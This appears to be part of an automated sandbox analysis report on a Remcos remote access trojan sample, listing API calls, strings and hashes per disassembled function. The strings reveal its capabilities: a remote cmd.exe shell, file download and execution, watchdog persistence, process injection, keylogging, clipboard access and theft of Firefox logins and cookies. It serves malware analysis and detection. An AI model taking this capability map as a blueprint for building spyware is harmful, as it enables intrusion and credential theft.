                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: c37cf524c63f5757edd935c017db940ef546b67fe649cc31a07347fd0354d86c
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994047E5
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                APIs
                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID:
                                                                                • API String ID: 724789610-0
                                                                                • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: recv
                                                                                • String ID:
                                                                                • API String ID: 1507349165-0
                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID:
                                                                                • API String ID: 2809346765-0
                                                                                • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005B04B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 1b4e7d6d64ef6482b3ae29e82acede09d6b0a6ae3ef443c5ed4c03ad212d50f9
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: A0112A79A40208EFDB01DF98C985E99BFF5AB08350F058094FA489B362D771EA50DB80
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                • API String ID: 2918587301-599666313
                                                                                • Opcode ID: 66c0a75e66747857048722de2f5a8f988e0fdfd323e85b4bbd61ae4f0198fe46
                                                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                • Opcode Fuzzy Hash: 66c0a75e66747857048722de2f5a8f988e0fdfd323e85b4bbd61ae4f0198fe46
                                                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                • API String ID: 3815868655-81343324
                                                                                • Opcode ID: 50b1d0fc91afe526fa1309d4a82df5ba01fe55afecd06ede1f11c4e8f9f9fb88
                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                • Opcode Fuzzy Hash: 50b1d0fc91afe526fa1309d4a82df5ba01fe55afecd06ede1f11c4e8f9f9fb88
                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                • API String ID: 65172268-860466531
                                                                                • Opcode ID: cfb04ba1926760254cd88be8b48c9f6bb6ad45a9b1fd41f21a489f834e60e5d2
                                                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                • Opcode Fuzzy Hash: cfb04ba1926760254cd88be8b48c9f6bb6ad45a9b1fd41f21a489f834e60e5d2
                                                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 1164774033-3681987949
                                                                                • Opcode ID: eea8fc23c147da3b60f56dcc74469d0638dedfb01c8569cb4c4dab3f4e54c3b7
                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                • Opcode Fuzzy Hash: eea8fc23c147da3b60f56dcc74469d0638dedfb01c8569cb4c4dab3f4e54c3b7
                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$File$FirstNext
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 3527384056-432212279
                                                                                • Opcode ID: ec68f83b2f7c6d439a506c8b4972814c1148e38401375b42d039e8e6b8023f69
                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                • Opcode Fuzzy Hash: ec68f83b2f7c6d439a506c8b4972814c1148e38401375b42d039e8e6b8023f69
                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                • API String ID: 726551946-3025026198
                                                                                • Opcode ID: 1202f06a0d6a6bd6507acd6e290c2798131bbc521a3cad66b5f78fa406b98fca
                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                • Opcode Fuzzy Hash: 1202f06a0d6a6bd6507acd6e290c2798131bbc521a3cad66b5f78fa406b98fca
                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                • String ID:
                                                                                • API String ID: 3520204547-0
                                                                                • Opcode ID: 2691f969ec90e64eb384eebc667e04d8ab46427997284debd9ba0406a325024a
                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                • Opcode Fuzzy Hash: 2691f969ec90e64eb384eebc667e04d8ab46427997284debd9ba0406a325024a
                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0079CD50
                                                                                • GetCursorPos.USER32(?), ref: 0079CD5F
                                                                                • SetForegroundWindow.USER32(?), ref: 0079CD68
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0079CD82
                                                                                • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0079CDD3
                                                                                • ExitProcess.KERNEL32 ref: 0079CDDB
                                                                                • CreatePopupMenu.USER32 ref: 0079CDE1
                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0079CDF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                                                • String ID:
                                                                                • API String ID: 1665278180-0
                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction ID: 69346591a74172046489891449d75fc3e5e4c49af905ed4fdf397af1de7921f3
                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction Fuzzy Hash: D521EA31214206FFDF165F64FD0EAAA3F79EB04342F144534BA06A50B2D7B9DA60EB18
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                • API String ID: 0-3177665633
                                                                                • Opcode ID: ab8cead1c51aeb0d65c1fa63b0ea02fb3941cc31de3c7ee09e1b7f2f3e179eb6
                                                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                • Opcode Fuzzy Hash: ab8cead1c51aeb0d65c1fa63b0ea02fb3941cc31de3c7ee09e1b7f2f3e179eb6
                                                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                • String ID: 8[G
                                                                                • API String ID: 1888522110-1691237782
                                                                                • Opcode ID: bdba82efd78dbfa46e06de91f6c115a05439826f479e25c853a32ad94c4ee5f3
                                                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                • Opcode Fuzzy Hash: bdba82efd78dbfa46e06de91f6c115a05439826f479e25c853a32ad94c4ee5f3
                                                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00406788
